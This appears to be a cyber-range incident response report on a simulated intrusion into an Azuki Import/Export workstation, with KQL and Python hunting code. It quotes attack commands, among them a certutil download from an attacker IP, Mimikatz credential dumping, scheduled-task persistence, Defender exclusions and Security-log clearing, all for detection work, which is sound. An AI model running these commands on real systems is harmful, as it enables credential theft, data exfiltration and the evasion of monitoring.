Incident Response Report
Azuki Import/Export
梓貿易株式会社
AZUKI-001  ·  Targeted Intrusion  ·  2025-11-19
ESCALATED TO
Josh — Cyber Range Community
Incident ID: AZUKI-001
Date of Report: February 17, 2026
Severity: HIGH
Report Status: Investigation Complete (Post-Incident Review)
Analyst: Yousef Nabil
Dwell Time (observed): ~34 min (18:37–19:11 UTC)
01 Executive Summary

Azuki Import/Export (梓貿易株式会社) investigated a targeted intrusion consistent with corporate espionage after a competitor undercut a long-term supplier contract by exactly 3% and supplier contracts/pricing data later appeared on underground forums. The compromise centered on the IT admin workstation azuki-sl during the window 2025-11-19 → 2025-11-20 (UTC), reconstructed using Microsoft Defender for Endpoint telemetry in Microsoft Sentinel across DeviceLogonEvents, DeviceProcessEvents, DeviceRegistryEvents, DeviceNetworkEvents, and DeviceFileEvents.

Telemetry confirmed successful RemoteInteractive (RDP) access to azuki-sl from the external IP 88.97.178.12 using the account kenji.sato. Following access, the threat actor moved quickly into tool transfer and environment preparation. At 18:37 UTC, PowerShell retrieved wupdate.ps1 from 78.141.196.6:8080, followed by additional script retrieval (wupdate.bat) between 18:46–18:49 UTC. During the same phase, Windows Defender posture was intentionally weakened by adding exclusions for .ps1, .bat, and .exe extensions and excluding the user Temp path (C:\Users\KENJI~1.SAT\AppData\Local\Temp) to reduce inspection of attacker tooling and execution artefacts.

With defenses softened, the actor performed interactive reconnaissance (ipconfig /all and arp -a) at 19:03–19:04 UTC, then established a dedicated staging area by hiding C:\ProgramData\WindowsCache at 19:05 UTC using attrib +h +s. Tooling was downloaded via LOLBIN abuse (certutil -urlcache -f) between 19:06–19:07 UTC, writing payloads as svchost.exe and mm.exe. Persistence was added at 19:07 UTC through a scheduled task named "Windows Update Check" executing C:\ProgramData\WindowsCache\svchost.exe daily at 02:00 as SYSTEM. Network telemetry differentiated staging versus C2: :8080 tied to PowerShell/certutil downloads, :443 tied to the staged payload (svchost.exe).

At 19:08 UTC, the actor executed mm.exe with command-line indicators consistent with Mimikatz usage (privilege::debug sekurlsa::logonpasswords) to extract credential material from LSASS. At 19:09 UTC, export-data.zip was exfiltrated from C:\ProgramData\WindowsCache via curl to a Discord webhook. At 19:10 UTC, the actor staged credentials for 10.1.0.188 using cmdkey (user fileadmin) and then initiated RDP via mstsc. The sequence concluded at 19:11 UTC with wevtutil cl Security.

Impact: Confirmed data exfiltration (export-data.zip), confirmed credential dumping activity (sekurlsa::logonpasswords), persistence established (scheduled task and a documented backdoor local account named support), Windows Defender exclusions applied, and Security log cleared to degrade forensic visibility.

02 WHO
External IPs
IP Address    | Role                        | Location            | ASN / Org                    | Type
88.97.178.12  | Initial access source (RDP) | London, England, UK | AS51809 — BRSK Limited       | DSL / Residential
78.141.196.6  | Tool staging + C2 server    | London, England, UK | AS20473 — Vultr Holdings LLC | Hosting (VPS)
Attacker Infrastructure
Indicator                      | Role                    | Notes
78.141.196.6:8080              | Payload/script delivery | :8080 correlated with PowerShell/certutil downloads
78.141.196.6:443               | C2 / beaconing          | :443 correlated with staged svchost.exe outbound communications
discord.com/api/webhooks/...   | Exfiltration endpoint   | curl upload of export-data.zip
Accounts Used
Account     | Type                    | Usage Observed
kenji.sato  | User account            | Successful RDP RemoteInteractive logon from 88.97.178.12
support     | Local backdoor          | Documented backdoor local account
fileadmin   | Lateral movement target | cmdkey credential staging + mstsc to 10.1.0.188
SYSTEM      | Local system            | Scheduled task execution context
03 WHAT
  • Threat actor accessed azuki-sl via RDP (RemoteInteractive) from 88.97.178.12 using kenji.sato.
  • Threat actor downloaded wupdate.ps1 from http://78.141.196.6:8080/wupdate.ps1 and wrote it into the user Temp path.
  • Threat actor downloaded wupdate.bat from http://78.141.196.6:8080/wupdate.bat and wrote it into the user Temp path.
  • Threat actor added Windows Defender extension exclusions for .bat, .ps1, .exe via Defender exclusion registry paths.
  • Threat actor added a Windows Defender path exclusion for C:\Users\KENJI~1.SAT\AppData\Local\Temp.
  • Threat actor performed interactive reconnaissance using ipconfig /all and arp -a.
  • Threat actor created and concealed a staging directory by applying attrib +h +s to C:\ProgramData\WindowsCache.
  • Threat actor abused certutil.exe -urlcache -f to download payloads into the staging directory, writing svchost.exe and mm.exe.
  • Threat actor created persistence via scheduled task "Windows Update Check" executing C:\ProgramData\WindowsCache\svchost.exe daily at 02:00 as SYSTEM.
  • Threat actor established external communications, using :8080 for transfer and :443 for payload communications to 78.141.196.6.
  • Threat actor executed credential dumping commands via mm.exe using privilege::debug and sekurlsa::logonpasswords.
  • Threat actor staged and exfiltrated C:\ProgramData\WindowsCache\export-data.zip using curl to https://discord.com/api/webhooks/....
  • Threat actor attempted lateral movement by storing credentials for 10.1.0.188 with cmdkey (user fileadmin) and initiating RDP via mstsc.exe /v:10.1.0.188.
  • Threat actor cleared the Windows Security event log using wevtutil.exe cl Security.
04 WHEN

Timeline (UTC; reconstructed from Defender telemetry using the queries in the KQL Queries section):

18:37          PowerShell downloaded wupdate.ps1 from 78.141.196.6:8080
18:46 – 18:49  Additional script download (wupdate.bat) and Windows Defender exclusions added
19:03 – 19:04  Interactive reconnaissance: ipconfig /all, arp -a
19:05          Staging directory hidden: attrib +h +s C:\ProgramData\WindowsCache
19:06 – 19:07  Payload downloads via certutil into staging (svchost.exe, mm.exe)
19:07          Persistence: scheduled task Windows Update Check → svchost.exe (SYSTEM, daily 02:00)
19:08          Credential dumping: mm.exe privilege::debug sekurlsa::logonpasswords exit
19:09          Exfiltration: curl uploaded export-data.zip to Discord webhook
19:10          Lateral movement attempt: cmdkey + mstsc to 10.1.0.188 (user fileadmin)
19:11          Anti-forensics: wevtutil cl Security

Observed dwell time: ~34 minutes (18:37–19:11 UTC).

05 WHERE
Targets
Host / IP   | Role
azuki-sl    | Primary compromised IT admin workstation
10.1.0.188  | Lateral movement attempt target (cmdkey + mstsc)
Malware / Tool Paths (as observed)
  • C:\ProgramData\WindowsCache (hidden staging directory)
  • C:\ProgramData\WindowsCache\svchost.exe (staged payload + persisted task target)
  • C:\ProgramData\WindowsCache\mm.exe (credential dumping tool)
  • C:\ProgramData\WindowsCache\export-data.zip (exfiltrated archive)
  • C:\Users\KENJI~1.SAT\AppData\Local\Temp (Defender excluded path)
  • C:\Users...\Temp\wupdate.ps1 (download destination shown in command line)
  • C:\Users...\Temp\wupdate.bat (download destination shown in command line)
Network Connections (as observed)
  • RDP Initial Access: 88.97.178.12 → azuki-sl (RemoteInteractive), account kenji.sato
  • Tool Transfer: azuki-sl → 78.141.196.6:8080 (PowerShell + certutil)
  • C2/Beaconing: azuki-sl → 78.141.196.6:443 (initiating process svchost.exe)
  • Exfiltration: azuki-sl → https://discord.com/api/webhooks/... (curl upload of export-data.zip)
  • Lateral Attempt: azuki-sl → 10.1.0.188 (cmdkey credential staging + mstsc)
06 WHY
Root Cause (evidence-based)
  • Valid credentials were used for interactive remote access (successful RDP RemoteInteractive logon as kenji.sato from an external IP).
  • The threat actor executed with sufficient rights to apply Windows Defender exclusions (extensions and path exclusions recorded under Defender exclusion registry locations).
  • The workstation allowed living-off-the-land transfer and execution patterns (PowerShell downloads, certutil -urlcache, scheduled task creation, and event log clearing) without prevention in the observed window.
  • Anti-forensic activity (Security log clearing) reduced visibility into authentication and privileged actions during the incident.
Attacker Goal

Steal sensitive business data (supplier contracts and pricing) and exfiltrate it off-network for competitive advantage.

07 HOW
Initial Access
  • Successful RDP (RemoteInteractive) access gained to azuki-sl using legitimate account kenji.sato from external IP 88.97.178.12.
Tooling Delivery
  • PowerShell used to retrieve wupdate.ps1 from external server 78.141.196.6 at 18:37 UTC.
  • PowerShell used to retrieve wupdate.bat from 78.141.196.6 between 18:46–18:49 UTC.
Defense Evasion
  • Windows Defender exclusions added for executable/script extensions: .ps1, .bat, .exe.
  • Windows Defender path exclusion added for C:\Users\KENJI~1.SAT\AppData\Local\Temp to support drop-and-run activity.
Discovery
  • Host and network reconnaissance executed using ipconfig /all at 19:03–19:04 UTC.
  • Neighbour/network discovery executed using arp -a at 19:03–19:04 UTC.
Staging
  • Staging directory created at C:\ProgramData\WindowsCache and concealed using attrib +h +s at 19:05 UTC.
  • LOLBIN certutil.exe -urlcache -f used to download payloads from 78.141.196.6:8080.
  • Staged executables written to disk as C:\ProgramData\WindowsCache\svchost.exe.
  • Staged executables written to disk as C:\ProgramData\WindowsCache\mm.exe.
  • Masquerading observed: a server-hosted filename (e.g., AdobeGC.exe) saved locally as mm.exe.
Persistence
  • Scheduled task created at 19:07 UTC named "Windows Update Check".
  • Task configured to execute C:\ProgramData\WindowsCache\svchost.exe daily at 02:00 as SYSTEM.
  • Persistence naming and execution context aligned with stealth: "Windows Update" theme + svchost.exe masquerade + non-standard ProgramData path.
Command-and-Control
  • Outbound activity to 78.141.196.6:8080 associated with payload/script transfer (PowerShell/certutil).
  • Outbound activity to 78.141.196.6:443 initiated by staged svchost.exe, consistent with C2-style communications to the same infrastructure.
Credential Access
  • Credential dumping executed at 19:08 UTC via mm.exe using: privilege::debug sekurlsa::logonpasswords exit.
  • Activity consistent with LSASS credential harvesting tradecraft (credential material exposure risk).
Collection and Exfiltration
  • Archive staged as export-data.zip within C:\ProgramData\WindowsCache.
  • Exfiltration executed at 19:09 UTC using curl to a Discord webhook endpoint: discord.com/api/webhooks/...
Lateral Movement Attempt
  • Credentials staged for internal target 10.1.0.188 using cmdkey with username fileadmin at 19:10 UTC.
  • RDP pivot attempt initiated using mstsc.exe /v:10.1.0.188 at 19:10 UTC.
Anti-Forensics
  • Windows Security event log cleared at 19:11 UTC using wevtutil.exe cl Security to reduce authentication and privilege-tracking visibility.
08 IMPACT
  • Confirmed: data theft occurred. export-data.zip was uploaded off-network via curl to https://discord.com/api/webhooks/....
  • Confirmed: credential exposure occurred. mm.exe executed sekurlsa::logonpasswords, indicating LSASS credential dumping activity.
  • Confirmed: persistence occurred. Scheduled task "Windows Update Check" runs C:\ProgramData\WindowsCache\svchost.exe as SYSTEM (daily at 02:00), and a documented backdoor local account named support exists.
  • Confirmed: security control degradation occurred. Windows Defender exclusions were added for .ps1, .bat, .exe and C:\Users\KENJI~1.SAT\AppData\Local\Temp.
  • Confirmed: forensic visibility was degraded. The Windows Security log was cleared.
Risk: HIGH
The combination of confirmed exfiltration, credential dumping, persistence, and log clearing creates material risk of follow-on access, reuse of exposed credentials, and broader compromise beyond the initially observed workstation and the attempted lateral target.
09 THREAT INTELLIGENCE

88.97.178.12 (Initial Access Source) — OSINT enrichment identified this IP as located in London, England, United Kingdom, associated with AS51809 (BRSK Limited) and characterised as DSL access. The residential nature of the source is consistent with interactive access paths such as stolen credentials used directly from consumer connectivity, rather than a dedicated cloud/VPS host typically seen for malware staging.

78.141.196.6 (Staging + C2 Server) — OSINT enrichment identified this IP as located in London, England, United Kingdom, with hostname 78.141.196.6.vultrusercontent.com, and associated with AS20473 (The Constant Company, LLC / Vultr Holdings LLC). The hosting classification supports its role as attacker-controlled infrastructure used for both payload delivery and C2. Telemetry showed clear role separation by port and initiating process: :8080 correlated directly with download utilities (powershell.exe, certutil.exe); :443 correlated with the staged payload (svchost.exe) communicating outbound, consistent with C2/beacon behaviour designed to blend into common HTTPS traffic.

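The port-and-initiating-process separation described above, implemented as a small classifier over DeviceNetworkEvents-style rows. This is an added example, not part of the original report; the rows, the 203.0.113.x placeholder addresses and the labels are constructed, and the folder-path check assumes the InitiatingProcessFolderPath column is populated.

```python
"""Separate 'tool transfer' connections from 'beacon/C2' connections by
destination port and initiating process, the distinction the report draws
for 78.141.196.6. Added example, not part of the original report; the
DeviceNetworkEvents-style rows below are constructed."""
from collections import defaultdict

# Utilities an operator drives interactively to pull or push files.
DOWNLOAD_UTILITIES = {"powershell.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}
# Directories a genuine svchost.exe lives in.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Constructed rows. 203.0.113.x addresses are documentation-range placeholders,
# not real Discord or Microsoft endpoints.
NETWORK_EVENTS = [
    {"TimeGenerated": "2025-11-19T18:37:05Z", "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessFolderPath": r"C:\Windows\System32\WindowsPowerShell\v1.0",
     "RemoteIP": "78.141.196.6", "RemotePort": 8080, "RemoteUrl": ""},
    {"TimeGenerated": "2025-11-19T19:06:40Z", "InitiatingProcessFileName": "certutil.exe",
     "InitiatingProcessFolderPath": r"C:\Windows\System32",
     "RemoteIP": "78.141.196.6", "RemotePort": 8080, "RemoteUrl": ""},
    {"TimeGenerated": "2025-11-19T19:07:55Z", "InitiatingProcessFileName": "svchost.exe",
     "InitiatingProcessFolderPath": r"C:\ProgramData\WindowsCache",
     "RemoteIP": "78.141.196.6", "RemotePort": 443, "RemoteUrl": ""},
    {"TimeGenerated": "2025-11-19T19:08:10Z", "InitiatingProcessFileName": "svchost.exe",
     "InitiatingProcessFolderPath": r"C:\ProgramData\WindowsCache",
     "RemoteIP": "78.141.196.6", "RemotePort": 443, "RemoteUrl": ""},
    {"TimeGenerated": "2025-11-19T19:09:20Z", "InitiatingProcessFileName": "curl.exe",
     "InitiatingProcessFolderPath": r"C:\Windows\System32",
     "RemoteIP": "203.0.113.10", "RemotePort": 443, "RemoteUrl": "discord.com"},
    # Benign noise: a genuine System32 svchost.exe talking HTTPS.
    {"TimeGenerated": "2025-11-19T12:00:00Z", "InitiatingProcessFileName": "svchost.exe",
     "InitiatingProcessFolderPath": r"C:\Windows\System32",
     "RemoteIP": "203.0.113.20", "RemotePort": 443, "RemoteUrl": ""},
]

def classify(row):
    """Label one connection by who initiated it and from where, not by port alone."""
    proc = row["InitiatingProcessFileName"].lower()
    in_system_dir = row["InitiatingProcessFolderPath"].lower().startswith(SYSTEM_DIRS)
    if proc in DOWNLOAD_UTILITIES:
        # Operator-driven download/upload: staging or exfiltration, not a beacon.
        return "tool-transfer"
    if proc == "svchost.exe" and not in_system_dir:
        # A system-binary name running from ProgramData and calling out on 443.
        return "c2-candidate"
    if not in_system_dir and row["RemotePort"] in (443, 8080):
        return "review"
    return "likely-benign"

def infrastructure_roles(rows):
    """Aggregate by (RemoteIP, RemotePort, process): label, connection count, first seen."""
    roles = defaultdict(lambda: {"label": None, "count": 0, "first_seen": None})
    for r in sorted(rows, key=lambda x: x["TimeGenerated"]):
        key = (r["RemoteIP"], r["RemotePort"], r["InitiatingProcessFileName"].lower())
        slot = roles[key]
        slot["label"] = classify(r)
        slot["count"] += 1
        slot["first_seen"] = slot["first_seen"] or r["TimeGenerated"]
    return dict(roles)

def c2_candidates(rows):
    """Destinations (IP, port) labelled as C2 candidates: the ones to block and hunt for."""
    return sorted({(ip, port) for (ip, port, _), v in infrastructure_roles(rows).items()
                   if v["label"] == "c2-candidate"})
```
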
Tools and Tradecraft Observed (host-based)
  • PowerShell (Invoke-WebRequest) for initial script transfer (wupdate.ps1, wupdate.bat) from an external server.
  • certutil.exe -urlcache -f for LOLBIN payload transfer into a hidden ProgramData staging directory.
  • schtasks.exe for persistence via a disguised scheduled task (Windows Update Check) running a staged payload as SYSTEM.
  • mm.exe executing privilege::debug and sekurlsa::logonpasswords, consistent with credential dumping activity.
  • curl.exe for outbound file upload/exfiltration of export-data.zip to a Discord webhook endpoint.
  • cmdkey.exe + mstsc.exe for credential staging and lateral movement attempt to 10.1.0.188 using fileadmin.
  • wevtutil.exe cl Security for anti-forensics (Security log clearing).
Malware / Payload Observations (based on paths + behaviour)
  • svchost.exe executing from C:\ProgramData\WindowsCache is inconsistent with legitimate Windows process placement and was used as the scheduled task payload and the process initiating :443 communications to the external infrastructure.
  • mm.exe served as the credential dumping tool, including evidence of masquerading at download time (server-hosted filename AdobeGC.exe saved to disk as mm.exe).
  • wupdate.ps1 / wupdate.bat functioned as staging enablers, preceding Defender exclusions, tool transfer, and persistence.
10 RECOMMENDATIONS
Immediate
  • Isolate azuki-sl from the network to prevent continued C2, exfiltration, or lateral movement attempts.
  • Disable/reset kenji.sato credentials immediately and treat all credentials used on azuki-sl as exposed due to confirmed LSASS dumping activity.
  • Remove persistence on azuki-sl: delete scheduled task "Windows Update Check"; remove/disable the documented backdoor local account named support (and validate no other local admin accounts were created).
  • Contain attacker infrastructure: block 78.141.196.6 at perimeter controls and hunt enterprise-wide for any communication attempts to this IP over :8080 and :443.
  • Preserve volatile and on-disk artefacts before cleanup: collect the full contents of C:\ProgramData\WindowsCache and export relevant Sentinel/MDE logs for chain-of-custody where applicable.
Short-Term (24–48 Hours)
  • Scope lateral movement risk: prioritise investigation of 10.1.0.188 for logons, new processes, scheduled tasks, Defender setting changes, and any evidence of credential reuse from azuki-sl.
  • Hunt for the same tradecraft across endpoints, specifically: Defender exclusion registry changes (Extensions and Paths); certutil -urlcache -f http usage; scheduled tasks executing binaries from ProgramData staging paths; wevtutil cl Security or other event log clearing behaviour.
  • Review network egress and proxy telemetry for Discord webhook patterns and identify whether similar webhook uploads occurred from other hosts.
  • Validate Defender posture on impacted systems: remove malicious exclusions and confirm protections are restored for scripts/executables and Temp paths.
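
The four-pattern hunt from the short-term list above, run over exported telemetry rows. This is an added example, not part of the original report or of Microsoft's tooling; the DeviceProcessEvents and DeviceRegistryEvents rows are constructed to mirror what the report describes (the schtasks command line in particular is a reconstruction, not a value quoted by the report).

```python
"""Hunt for the tradecraft named in the short-term recommendations: Defender
exclusion registry writes, certutil -urlcache -f http downloads, scheduled
tasks launched from ProgramData, and event log clearing. Added example, not
part of the original report; all rows below are constructed."""
import re

# Constructed DeviceProcessEvents-style rows (subset of columns).
PROCESS_EVENTS = [
    {"TimeGenerated": "2025-11-19T19:06:10Z", "DeviceName": "azuki-sl",
     "ProcessCommandLine": "certutil -urlcache -f http://78.141.196.6:8080/AdobeGC.exe "
                           "C:\\ProgramData\\WindowsCache\\mm.exe"},
    {"TimeGenerated": "2025-11-19T19:07:02Z", "DeviceName": "azuki-sl",
     "ProcessCommandLine": 'schtasks /create /tn "Windows Update Check" '
                           "/tr C:\\ProgramData\\WindowsCache\\svchost.exe /sc daily /st 02:00 /ru SYSTEM"},
    {"TimeGenerated": "2025-11-19T19:11:30Z", "DeviceName": "azuki-sl",
     "ProcessCommandLine": "wevtutil cl Security"},
    # Benign noise: a task that runs from System32 on another host.
    {"TimeGenerated": "2025-11-19T09:00:00Z", "DeviceName": "hr-02",
     "ProcessCommandLine": "schtasks /create /tn Backup /tr C:\\Windows\\System32\\backup.exe /sc daily"},
]
# Constructed DeviceRegistryEvents-style rows for the Defender exclusion writes.
REGISTRY_EVENTS = [
    {"TimeGenerated": "2025-11-19T18:48:00Z", "DeviceName": "azuki-sl", "ActionType": "RegistryValueSet",
     "RegistryKey": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions",
     "RegistryValueName": ".ps1"},
    {"TimeGenerated": "2025-11-19T18:49:00Z", "DeviceName": "azuki-sl", "ActionType": "RegistryValueSet",
     "RegistryKey": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
     "RegistryValueName": r"C:\Users\KENJI~1.SAT\AppData\Local\Temp"},
    # Benign noise: key creation without a value write adds no exclusion.
    {"TimeGenerated": "2025-11-19T10:00:00Z", "DeviceName": "hr-02", "ActionType": "RegistryKeyCreated",
     "RegistryKey": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths", "RegistryValueName": ""},
]

# Command-line rules, one per pattern; case-insensitive because cmd.exe is.
RULES = {
    "certutil_urlcache_download": re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I),
    "schtask_from_programdata": re.compile(r"schtasks(\.exe)?\b.*\s/create\b.*\s/tr\s+\"?c:\\programdata\\", re.I),
    "eventlog_cleared": re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\s+\S+", re.I),
}

def hunt_process_events(rows):
    """Return (rule, device, time, command line) for each matching row, in time order."""
    hits = []
    for r in sorted(rows, key=lambda x: x["TimeGenerated"]):
        for name, pattern in RULES.items():
            if pattern.search(r["ProcessCommandLine"]):
                hits.append((name, r["DeviceName"], r["TimeGenerated"], r["ProcessCommandLine"]))
    return hits

def hunt_defender_exclusions(rows):
    """Return (rule, device, excluded value) for Defender exclusion values actually set."""
    hits = []
    for r in sorted(rows, key=lambda x: x["TimeGenerated"]):
        if r["ActionType"] != "RegistryValueSet":
            continue  # only a value write adds an exclusion
        key = r["RegistryKey"].lower()
        if r"windows defender\exclusions\extensions" in key:
            hits.append(("defender_extension_exclusion", r["DeviceName"], r["RegistryValueName"]))
        elif r"windows defender\exclusions\paths" in key:
            hits.append(("defender_path_exclusion", r["DeviceName"], r["RegistryValueName"]))
    return hits

def devices_with_full_chain(process_rows, registry_rows):
    """Devices showing all four pattern families, i.e. the chain reconstructed on azuki-sl."""
    seen = {}
    for rule, device, *_ in hunt_process_events(process_rows) + hunt_defender_exclusions(registry_rows):
        seen.setdefault(device, set()).add(rule.split("_")[0])  # certutil / schtask / eventlog / defender
    return sorted(d for d, families in seen.items() if len(families) == 4)
```

Single-pattern hits are worth triage on their own; a device returned by devices_with_full_chain should be treated as a repeat of the AZUKI-001 sequence and isolated.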
Long-Term (1–4 Weeks)
  • Reduce RDP exposure and credential replay risk: restrict RemoteInteractive access paths to only approved sources and enforce stronger authentication controls for remote access.
  • Harden endpoint controls against LOLBIN transfer and disguised persistence: establish detections/blocks for suspicious certutil download patterns, scheduled tasks running from non-standard directories, and svchost-named binaries executing outside System32.
  • Implement durable monitoring for credential dumping: alert on command-line indicators like sekurlsa::logonpasswords and suspicious debug privilege enabling where feasible.
  • Improve anti-forensics visibility: implement monitoring and alerting for event log clearing and correlate with remote logons, task creation, and outbound connections.
  • Data protection governance: review and strengthen controls around storage/handling of supplier contracts and pricing artefacts to reduce blast radius if a single workstation is compromised.
11 LESSONS LEARNED
  • A "quiet" business anomaly can be the first meaningful indicator of a targeted intrusion and data theft.
  • Defender exclusions for scripts/executables and Temp directories directly enable rapid tool execution and should be treated as high-signal events.
  • A hidden ProgramData staging directory combined with masqueraded filenames ("svchost.exe", "mm.exe") is strong evidence of deliberate tradecraft rather than accidental software behaviour.
  • Credential dumping marks a pivot point from single-host compromise to assumed credential exposure across the environment.
  • Clearing the Security event log is a decisive anti-forensic action that should immediately elevate incident priority and scoping urgency.
  • Separating "tool transfer" traffic from "beacon/C2" traffic by port and initiating process prevents misclassification of attacker infrastructure roles.
12 KQL QUERIES
Q01 — Successful RemoteInteractive logons (Initial Access Source IP + Account)
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ActionType == "LogonSuccess"
| summarize count() by RemoteIP, AccountName
Q02 — Pivot on the attacker source IP (session validation)
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where RemoteIP == "88.97.178.12"
| project TimeGenerated, DeviceName, AccountName, LogonType, ActionType, RemoteIP, IsLocalAdmin, InitiatingProcessFileName
| order by TimeGenerated asc
Q03 — Recon commands executed (ipconfig / arp)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("ipconfig", "arp -a")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine
| order by TimeGenerated asc
Q04 — Staging directory hiding (attrib +h +s)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has "attrib"
| project TimeGenerated, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q05 — Defender extension exclusions (count + values)
KQL
DeviceRegistryEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where RegistryKey has @"Windows Defender\Exclusions\Extensions"
| where ActionType == "RegistryValueSet"
| summarize Extensions=make_set(RegistryValueName), Count=dcount(RegistryValueName)
Q06 — Defender path exclusions (exact excluded path)
KQL
DeviceRegistryEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where RegistryKey has @"Windows Defender\Exclusions\Paths"
| where ActionType == "RegistryValueSet"
| project TimeGenerated, RegistryValueName
| order by TimeGenerated asc
Q07 — HTTP-related process command lines (PowerShell + certutil)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has "http"
| project TimeGenerated, FileName, ProcessCommandLine
| order by TimeGenerated asc
Q08 — Scheduled task creation (persistence)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("schtasks", "/create")
| project TimeGenerated, ProcessCommandLine
Q09 — Local user creation / backdoor account
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("net user", "net localgroup", "/add")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine
| order by TimeGenerated asc
Q10 — Connections to external server (staging vs C2 port separation)
KQL
DeviceNetworkEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where RemoteIP == "78.141.196.6"
| project TimeGenerated, InitiatingProcessFileName, RemoteIP, RemotePort
| order by TimeGenerated asc
Q11 — Credential dumping indicators (mimikatz / sekurlsa)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("sekurlsa::logonpasswords", "privilege::debug", "mimikatz")
| project TimeGenerated, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q12 — Staging directory file activity (create/rename evidence)
KQL
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where FolderPath startswith @"C:\ProgramData\WindowsCache\"
| where ActionType in ("FileCreated","FileRenamed")
| project TimeGenerated, ActionType, FolderPath, FileName, PreviousFileName, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q13 — Exfiltration + RDP tooling (curl / cmdkey / mstsc)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has_any ("curl", "cmdkey", "mstsc")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, DeviceName
| order by TimeGenerated asc
Q14 — Security log clearing (anti-forensics)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-20))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine has "wevtutil" and ProcessCommandLine has_any ("cl", "clear-log")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, DeviceName
| order by TimeGenerated asc
CONFIDENTIAL Azuki Import/Export — Targeted Intrusion  ·  Yousef Nabil  ·  February 17, 2026